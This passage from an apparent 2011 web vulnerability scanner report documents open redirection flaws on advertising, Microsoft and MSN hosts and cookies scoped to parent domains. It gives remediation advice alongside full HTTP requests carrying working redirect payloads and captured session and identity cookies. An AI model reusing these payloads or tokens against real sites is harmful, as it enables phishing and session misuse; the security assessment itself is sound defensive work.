User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:27 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:27 GMT
Last-Modified: Fri, 28 Jan 2011 00:49:27 GMT
ETag: "1CBBE8536D44580"
Content-Type: text/html
Content-Length: 14619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

15. Open redirection
There are 11 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


15.1. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cmap.am.ace.advertising.com
Path:   /amcm.ashx

Issue detail

The value of the admeld_callback request parameter is used to perform an HTTP redirect. The payload http%3a//a9b5c9e7d56de789a/a%3fhttp%3a//tag.admeld.com/match was submitted in the admeld_callback parameter. This caused a redirection to the following URL:

Request

GET /amcm.ashx?admeld_adprovider_id=1&admeld_call_type=redirect&admeld_callback=http%3a//a9b5c9e7d56de789a/a%3fhttp%3a//tag.admeld.com/match HTTP/1.1
Host: cmap.am.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://a9b5c9e7d56de789a/a?http://tag.admeld.com/match?admeld_adprovider_id=1&external_user_id=0&expiration=1296940074
Cache-Control: private, max-age=3600
Expires: Sun, 30 Jan 2011 03:07:54 GMT
Content-Length: 0


15.2. http://developer.windowsphone.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://developer.windowsphone.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .aef13bb7348a0a2ce/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.aef13bb7348a0a2ce/=1 HTTP/1.1
Host: developer.windowsphone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://create.msdn.com?.aef13bb7348a0a2ce/=1
Server: Microsoft-IIS/7.0
p3p: CP="NOI CURa TAIa INT"
Date: Sun, 30 Jan 2011 16:30:29 GMT
Connection: close
Content-Length: 167

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://create.msdn.com?.aef13bb7348a0a2ce/=1">here</a></body>

15.3. http://go.microsoft.com/fwlink/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://go.microsoft.com
Path:   /fwlink/

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a8f7c1e946cdd6794/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /fwlink/?LinkId=69157&.a8f7c1e946cdd6794/=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: go.microsoft.com
Cookie: MSID=Microsoft.CreationDate=01/01/2011 01:19:35&Microsoft.LastVisitDate=01/01/2011 01:19:36&Microsoft.VisitStartDate=01/01/2011 01:19:35&Microsoft.CookieId=5936fd78-823e-4d23-86ed-4e6db6ac8f1c&Microsoft.TokenId=f70fdaf0-f92a-4b5d-a32e-37393a50bd2e&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0284-8242-0555-1674; MC1=GUID=5b046e389ed92e4ea31425cd07b41623&HASH=386e&LV=201012&V=3; A=I&I=AxUFAAAAAADnCAAA1xAOwzpNh6/jVe+nUDXygw!!; MUID=AD04D6F8B2FF44629973BD0674351135; ixpLightBrowser=0

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 157
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 16:40:28 GMT
Location: http://www.redacted?.a8f7c1e946cdd6794/=1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:41:27 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.redacted?.a8f7c1e946cdd6794/=1">here</a>.</h2>
</body></html>

15.4. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload http%3a//aefdf45cccfdf6a24/a%3f1 was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

Request

GET /getuid?http%3a//aefdf45cccfdf6a24/a%3f1=1 HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG6Q/DYS3+0s]#%2L_'x%SEV/i#+93=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiI0aU8E.A1>N#b#Qdqc@TwKrL$L2pv>3u[KE^pd=S(K$r@Fp>9H; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 31-Jan-2011 02:08:30 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 02:08:30 GMT; domain=.adnxs.com; HttpOnly
Location: http://aefdf45cccfdf6a24/a?1=1
Date: Sun, 30 Jan 2011 02:08:30 GMT
Content-Length: 0
Connection: close


15.5. http://jp.video.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://jp.video.redacted
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .ab9ee8914f626bc99/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.ab9ee8914f626bc99/=1 HTTP/1.1
Host: jp.video.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:09:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Machine: S02
Location: http://video.redacted?mkt=ja-jp&.ab9ee8914f626bc99/=1
Cache-Control: private
Content-Length: 0


15.6. http://latino.video.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://latino.video.msn.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .aee7ddd5962f48d29/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.aee7ddd5962f48d29/=1 HTTP/1.1
Host: latino.video.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:09:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Machine: L02
Location: http://video.redacted?mkt=es-us&brand=latino&.aee7ddd5962f48d29/=1
Cache-Control: private
Content-Length: 0


15.7. http://ninemsn.video.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ninemsn.video.msn.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .af86b8eda8e8b4b2a/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.af86b8eda8e8b4b2a/=1 HTTP/1.1
Host: ninemsn.video.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:17:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Machine: S02
Location: http://video.redacted?mkt=en-au&brand=ninemsn&.af86b8eda8e8b4b2a/=1
Cache-Control: private
Content-Length: 0


15.8. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 [trg parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The value of the trg request parameter is used to perform an HTTP redirect. The payload http%3a//a24bb191d3f37d4f6/a%3f was submitted in the trg parameter. This caused a redirection to the following URL:

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http%3a//a24bb191d3f37d4f6/a%3f HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=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!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://a24bb191d3f37d4f6/a?
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 144
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 02:18:24 GMT
Connection: close
Set-Cookie: C2=wpMRNJpwIg02FqECdbdhKhwUwXoSI8Y4FqECYTehKhQ3gZoSIQTnGqECF2phKhAohXoSIYZ4FqECKGehKhwohXoSIca4FqECiGehKhQshXoSwOYAM/oRhI7YCwAoGj0r1RQcKasLGK2AI9YRoN53EkL3F+ygPXw6TV4UsumB/0mBhca7GIaWG4frMew41Z0Ckq1B6bjBLq6bDwWZGj6r4jQsMagJwaHCW8oBm0I9IsfzFeysNiQQoaoSCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:24 GMT; path=/
Set-Cookie: F1=BAnyE1kAAAAAdVyCAEAAOEA; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:24 GMT; path=/
Set-Cookie: ROLL=v5Q2Y0M/d+zqGNHXUFc390yISxIi0bPhr7fCKadF7gTOdF6VqYmq8tecT61vdkvTdqiqdic8fskwW3tYTUArYRl+0nSSt+7FW6iaoRF!; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:24 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://a24bb191d3f37d4f6/a?">here</a>.</h2>
</body></html>

15.9. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 [trg parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The value of the trg request parameter is used to perform an HTTP redirect. The payload http%3a//aff678c0f8818bcd6/a%3fhttp%3a//b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366%3f%3bord%3d860849269%3f was submitted in the trg parameter. This caused a redirection to the following URL:

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http%3a//aff678c0f8818bcd6/a%3fhttp%3a//b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366%3f%3bord%3d860849269%3f HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=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!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://aff678c0f8818bcd6/a?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:31 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 361
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 02:18:31 GMT
Connection: close
Set-Cookie: C2=3pMRNJpwIg02FqECdbdhKhwUwXoSI8Y4FqECYTehKhQ3gZoSIQTnGqECF2phKhAohXoSIYZ4FqECKGehKhwohXoSIca4FqECiGehKhQshXoSwOYAM/oRhI7YCwAoGj0r1RQcKasLGK2AI9YRoN53EkL3F+ygPXw6TV4UsumB/0mBhca7GIaWG4frMew41Z0Ckq1B6bjBLq6bDwWZGj6r4jQsMagJwaHCW8oBm0I9IsfzFeysNiQQoaoSCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:31 GMT; path=/
Set-Cookie: F1=BcnyE1kAAAAAdVyCAEAAOEA; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:31 GMT; path=/
Set-Cookie: ROLL=v5Q2Y0M/d+zqGNHXUFc390yISxIi0bPhr7fCKadF7gTOdF6VqYmq8tecT61vdkvTdqiqdic8fskwW3tYTUArYRl+0nSSt+7FW6iaoRF!; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:31 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://aff678c0f8818bcd6/a?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/
...[SNIP]...

15.10. http://video.fr.sympatico.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.fr.sympatico.redacted
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a6103e627b507d6ae/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.a6103e627b507d6ae/=1 HTTP/1.1
Host: video.fr.sympatico.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 03:04:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Machine: S02
Location: http://video.redacted?mkt=fr-ca&.a6103e627b507d6ae/=1
Cache-Control: private
Content-Length: 0


15.11. http://video.sympatico.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.sympatico.redacted
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a94ca25af6512fea/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.a94ca25af6512fea/=1 HTTP/1.1
Host: video.sympatico.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 03:04:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Machine: S02
Location: http://video.redacted?mkt=en-ca&brand=sympatico&.a94ca25af6512fea/=1
Cache-Control: private
Content-Length: 0


16. Cookie scoped to parent domain
There are 302 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


16.1. http://c.microsoft.com/trans_pixel.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-6&ti=We%20are%20sorry%2C%20the%20page%20you%20requested%20cannot%20be%20found.&si=1&sv=3.0&fi=1&fv=10.1&r=http%3A%2F%2Fburp%2Fshow%2F42&ts=1296399108879&sr=1920x1200&bs=1020x1715 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js'
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1296391908891:ss=1296391908891; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=de6cd851-c13e-496a-b118-22137b8dc5b1&Microsoft.CreationDate=01/30/2011 14:50:57&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.NumberOfVisits=1&SessionCookie.Id=699284D5514B373BB0DF32C40A1FD561; domain=microsoft.com; expires=Sun, 30-Jan-2011 15:20:57 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.VisitStartDate=01/30/2011 14:50:57&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=2&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; domain=microsoft.com; expires=Mon, 30-Jan-2012 14:50:57 GMT; path=/
Set-Cookie: MS0=864ee6b5e2b44b9cadb6502b2d8e8c54; domain=.microsoft.com; expires=Sun, 30-Jan-2011 15:20:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 14:50:57 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

16.2. http://msn.whitepages.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.whitepages.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msn.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:50:09 GMT
Connection: close
